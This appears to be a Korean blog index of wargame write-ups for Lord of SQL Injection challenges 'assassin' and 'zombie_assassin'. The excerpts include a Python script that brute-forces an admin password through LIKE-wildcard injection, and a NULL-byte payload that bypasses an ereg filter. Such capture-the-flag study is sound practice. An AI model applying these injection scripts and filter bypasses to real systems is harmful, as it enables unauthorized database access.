LOS :: 15번 ASSASSIN WRITE UP 12345678910111213import requests url = "http://los.rubiya.kr/assassin_14a1fd552c61c60f034879e5d4171373.php"session = {'PHPSESSID':'MY_SESSION'}data = {} for j in range(48,127): data['pw']="%0"+chr(j)+"%" res = requests.get(url, params=data, cookies=session) if "Hello admin" in res.text: print("[♪] ASSASSIN Clear!") break Colored by Color Scriptercs Wargame/LOS(rubiya) 7년 전
[LOS]16번 zombie_assassin 으 징그럽다 좀비가된 어쎄신이다..... 빠르게 눌러버자 꽈악 막힌느낌이다. 다행인건 ereg함수를 통해 필터링하고 있다는 점이다. 저번에 친구와 여러 이야기를 나누다가 ereg 취약점에 대한 이야기가 스쳐지나갔었는데 그날 찾아본 바로는 ereg함수는 NULL까지만 검사를 한다고 했다. 즉, NULL 뒤에는 필터링을 하지 않는다는 것이다 %admin' or id='admin' --%20 이렇게 인젝션을 하자 풀렸다. 밑의 쿼리를 보면 알겠지만 null을 넣어도 admin이 되어버리는데 굳이 id=admin을 한번 더 넣어줬는지 의문이 들 수 있다. 그 이유는 NULL이 여기서는 하나의 인덱스를 가지고있기 때문이다. 그렇기 때문에 실제로 크기를 출력해보면 %00admin => 6글자 admin => 5글자.. Wargame/LOS(eagle-jump) 8년 전
[LOS]15번 assassin 좀 멋있는 친구가 나타났다 클릭해보자 like가 고정되어있고 쿼터가 막혀있기 때문에 보이는 그대로 like를 이용해야 할것같다. (http://g0pher.tistory.com/182) %%를 입력하니 guest가 뜬다. 첫글자부터 하나씩 찾아야 한다는 건데 출제자가 admin과 guest의 pw를 앞 몇글자가 동일하도록 만들어놓았을것 같다. 꽁으로 문제를 주진 않았을테니까? 코딩을 하자 12345678910111213141516import requests URL = 'http://los.eagle-jump.org/assassin_bec1c90a48bc3a9f95fbf0c8ae8c88e1.php'head={ 'cookie' : 'PHPSESSID=r3k3; __cfduid=d437' } for i in .. Wargame/LOS(eagle-jump) 8년 전